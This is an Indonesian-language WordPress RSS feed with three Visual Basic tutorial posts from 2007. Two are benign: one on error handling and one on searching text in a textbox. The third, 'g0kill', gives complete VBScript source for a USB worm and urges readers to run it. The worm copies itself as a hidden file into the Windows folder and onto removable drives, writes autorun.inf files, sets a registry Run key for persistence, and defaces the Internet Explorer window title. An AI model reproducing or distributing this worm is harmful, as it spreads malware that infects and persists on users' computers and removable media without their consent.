<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Neclord &#187; Tutorial</title>
	<atom:link href="http://neclord.wordpress.com/category/tutorial/feed/" rel="self" type="application/rss+xml" />
	<link>http://neclord.wordpress.com</link>
	<description>Resources, Articles, News, Informations, Tutorials, etc ...</description>
	<lastBuildDate>Sat, 24 Nov 2007 12:11:38 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<language>id</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='neclord.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/a76082386b850ad077298788bc77f4e3?s=96&#038;d=http://s.wordpress.com/i/buttonw-com.png</url>
		<title>Neclord &#187; Tutorial</title>
		<link>http://neclord.wordpress.com</link>
	</image>
			<item>
		<title>Penanganan error</title>
		<link>http://neclord.wordpress.com/2007/11/24/penanganan-error/</link>
		<comments>http://neclord.wordpress.com/2007/11/24/penanganan-error/#comments</comments>
		<pubDate>Sat, 24 Nov 2007 12:11:38 +0000</pubDate>
		<dc:creator>neclord</dc:creator>
				<category><![CDATA[Tutorial]]></category>
		<category><![CDATA[Visual Basic]]></category>

		<guid isPermaLink="false">http://neclord.wordpress.com/2007/11/24/penanganan-error/</guid>
		<description><![CDATA[Error pada aplikasi memanglah sering kali terjadi karena kesalahan prosedur, atau juga karena input dari user. Untuk penanganan error dengan code coba dengan code penanganan error sbb:
On Local Error GoTo Result
Dim x() As Boolean
Dim y As Variant
'buat error
y = x(10)

Result:
If Err.Number = 9 Then
   ' penanganan
Else
   ' penanganan lainnya
End If
Dengan menggunakan [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=neclord.wordpress.com&blog=2170562&post=14&subd=neclord&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Error pada aplikasi memanglah sering kali terjadi karena kesalahan prosedur, atau juga karena input dari user. Untuk penanganan error dengan code coba dengan code penanganan error sbb:</p>
<pre>On Local Error GoTo Result
Dim x() As Boolean
Dim y As Variant
'buat error
y = x(10)

Result:
If Err.Number = 9 Then
   ' penanganan
Else
   ' penanganan lainnya
End If</pre>
<p>Dengan menggunakan err.number, kita dapat memberikan solusi untuk masalah yang sedang terjadi.</p>
<p>Atau gunakan saja solusi alternatif seperti ini:</p>
<pre>On error resume next
'Error
Kill "c:\abcdredadnf.aaabbbccc"</pre>
<p>Penanganan error dengan cara seperti atas membuat kita melangkahi error tampa perbaikan apapun (Diabaikan).</p>
<p>Selamat mencoba :)</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/neclord.wordpress.com/14/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/neclord.wordpress.com/14/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/neclord.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/neclord.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/neclord.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/neclord.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/neclord.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/neclord.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/neclord.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/neclord.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/neclord.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/neclord.wordpress.com/14/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=neclord.wordpress.com&blog=2170562&post=14&subd=neclord&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://neclord.wordpress.com/2007/11/24/penanganan-error/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/454314c336af1be4834c429ed8929456?s=96&#38;d=identicon" medium="image">
			<media:title type="html">neclord</media:title>
		</media:content>
	</item>
		<item>
		<title>Mencari text di textbox</title>
		<link>http://neclord.wordpress.com/2007/11/24/mencari-text-di-textbox/</link>
		<comments>http://neclord.wordpress.com/2007/11/24/mencari-text-di-textbox/#comments</comments>
		<pubDate>Sat, 24 Nov 2007 12:02:23 +0000</pubDate>
		<dc:creator>neclord</dc:creator>
				<category><![CDATA[Tutorial]]></category>
		<category><![CDATA[Visual Basic]]></category>

		<guid isPermaLink="false">http://neclord.wordpress.com/2007/11/24/mencari-text-di-textbox/</guid>
		<description><![CDATA[Pertama tambahkan 1 buah textbox ke form. Lalu masukan kode sbb:
Private Sub Form_Load() teks = "oke" If teks &#60;&#62; "" ThenIf InStr(Text1, teks) &#60;&#62; 0 Then
Text1.SelStart = InStr(Text1, teks) - 1
Text1.SelLength = Len(teks)
Else
MsgBox "Kata yang Anda cari tidak ditemukan"
End If
End If
End Sub
Selamat mencoba  
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=neclord.wordpress.com&blog=2170562&post=13&subd=neclord&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Pertama tambahkan 1 buah textbox ke form. Lalu masukan kode sbb:</p>
<pre>Private Sub Form_Load() teks = "oke" If teks &lt;&gt; "" ThenIf InStr(Text1, teks) &lt;&gt; 0 Then
Text1.SelStart = InStr(Text1, teks) - 1
Text1.SelLength = Len(teks)
Else
MsgBox "Kata yang Anda cari tidak ditemukan"
End If
End If
End Sub</pre>
<p>Selamat mencoba <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/neclord.wordpress.com/13/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/neclord.wordpress.com/13/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/neclord.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/neclord.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/neclord.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/neclord.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/neclord.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/neclord.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/neclord.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/neclord.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/neclord.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/neclord.wordpress.com/13/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=neclord.wordpress.com&blog=2170562&post=13&subd=neclord&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://neclord.wordpress.com/2007/11/24/mencari-text-di-textbox/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/454314c336af1be4834c429ed8929456?s=96&#38;d=identicon" medium="image">
			<media:title type="html">neclord</media:title>
		</media:content>
	</item>
		<item>
		<title>g0kill</title>
		<link>http://neclord.wordpress.com/2007/11/21/g0kill/</link>
		<comments>http://neclord.wordpress.com/2007/11/21/g0kill/#comments</comments>
		<pubDate>Wed, 21 Nov 2007 11:27:38 +0000</pubDate>
		<dc:creator>neclord</dc:creator>
				<category><![CDATA[Tutorial]]></category>

		<guid isPermaLink="false">http://neclord.wordpress.com/2007/11/21/g0kill/</guid>
		<description><![CDATA[Mau jadi gokill comp?? Maksudnya mau coba yang g0k1ll g0k1ll di komputer anda?? Mungkin anda bisa mencoba yang satu ini:
SENI TEHNIK GOKIL
Langsung saja, pertama buka noteopad ketik/copy paste code ini:
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = &#8220;[autorun]&#8220;&#38;vbcrlf&#38;&#8221;shellexecute=wscript.exe winsetting.vbs&#8221;
set fs = createobject(&#8220;Scripting.FileSystemObject&#8221;)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&#38;text.readline
mysource=mysource &#38; vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=neclord.wordpress.com&blog=2170562&post=7&subd=neclord&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Mau jadi gokill comp?? Maksudnya mau coba yang g0k1ll g0k1ll di komputer anda?? Mungkin anda bisa mencoba yang satu ini:</p>
<p><strong>SENI TEHNIK GOKIL</strong></p>
<p>Langsung saja, pertama buka noteopad ketik/copy paste code ini:</p>
<p>on error resume next</p>
<p>dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd</p>
<p>atr = &#8220;[autorun]&#8220;&amp;vbcrlf&amp;&#8221;shellexecute=wscript.exe winsetting.vbs&#8221;</p>
<p>set fs = createobject(&#8220;Scripting.FileSystemObject&#8221;)</p>
<p>set mf = fs.getfile(Wscript.ScriptFullname)</p>
<p>dim text,size</p>
<p>size = mf.size</p>
<p>check = mf.drive.drivetype</p>
<p>set text=mf.openastextstream(1,-2)</p>
<p>do while not text.atendofstream</p>
<p>mysource=mysource&amp;text.readline</p>
<p>mysource=mysource &amp; vbcrlf</p>
<p>loop</p>
<p>do</p>
<p>Set winpath = fs.getspecialfolder(0)</p>
<p>set tf = fs.getfile(winpath &amp; &#8220;\winsetting.vbs&#8221;)</p>
<p>tf.attributes = 32</p>
<p>set tf=fs.createtextfile(winpath &amp; &#8220;\winsetting.vbs&#8221;,2,true)</p>
<p>tf.write mysource</p>
<p>tf.close</p>
<p>set tf = fs.getfile(winpath &amp; &#8220;\winsetting.vbs&#8221;)</p>
<p>tf.attributes = 39</p>
<p>for each flashdrive in fs.drives</p>
<p>If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path &lt;&gt; &#8220;A:&#8221; then</p>
<p>set tf=fs.getfile(flashdrive.path &amp;&#8221;\winsetting.vbs&#8221;)</p>
<p>tf.attributes =32</p>
<p>set tf=fs.createtextfile(flashdrive.path &amp;&#8221;\winsetting.vbs&#8221;,2,true)</p>
<p>tf.write mysource</p>
<p>tf.close</p>
<p>set tf=fs.getfile(flashdrive.path &amp;&#8221;\winsetting.vbs&#8221;)</p>
<p>tf.attributes =39</p>
<p>set tf =fs.getfile(flashdrive.path &amp;&#8221;\autorun.inf&#8221;)</p>
<p>tf.attributes = 32</p>
<p>set tf=fs.createtextfile(flashdrive.path &amp;&#8221;\autorun.inf&#8221;,2,true)</p>
<p>tf.write atr</p>
<p>tf.close</p>
<p>set tf =fs.getfile(flashdrive.path &amp;&#8221;\autorun.inf&#8221;)</p>
<p>tf.attributes=39</p>
<p>end if</p>
<p>next</p>
<p>set rg = createobject(&#8220;WScript.Shell&#8221;)</p>
<p>rg.regwrite &#8220;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL&#8221;,winpath&amp;&#8221;\winsetting.vbs&#8221;</p>
<p>rg.regwrite &#8220;HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title&#8221;,&#8221;Hacked by Necklord !!&#8221;</p>
<p>rg.regwrite &#8220;HKCR\vbsfile\DefaultIcon&#8221;,&#8221;shell32.dll,2&#8243;</p>
<p>if check &lt;&gt; 1 then</p>
<p>Wscript.sleep 200000</p>
<p>end if</p>
<p>loop while check&lt;&gt;1</p>
<p>set sd = createobject(&#8220;Wscript.shell&#8221;)</p>
<p>sd.run winpath&amp;&#8221;\explorer.exe /e,/select, &#8220;&amp;Wscript.ScriptFullname</p>
<p>2. Klik file, pilih save. Kemudian berinama bebas dengan ahkiran .vbs. Misal : g0kill.vbs.</p>
<p>3. Buka file yang anda buat tadi &#8230;</p>
<p>4. Selamat menjadi gokil &#8230;</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/neclord.wordpress.com/7/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/neclord.wordpress.com/7/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/neclord.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/neclord.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/neclord.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/neclord.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/neclord.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/neclord.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/neclord.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/neclord.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/neclord.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/neclord.wordpress.com/7/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=neclord.wordpress.com&blog=2170562&post=7&subd=neclord&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://neclord.wordpress.com/2007/11/21/g0kill/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/454314c336af1be4834c429ed8929456?s=96&#38;d=identicon" medium="image">
			<media:title type="html">neclord</media:title>
		</media:content>
	</item>
	</channel>
</rss>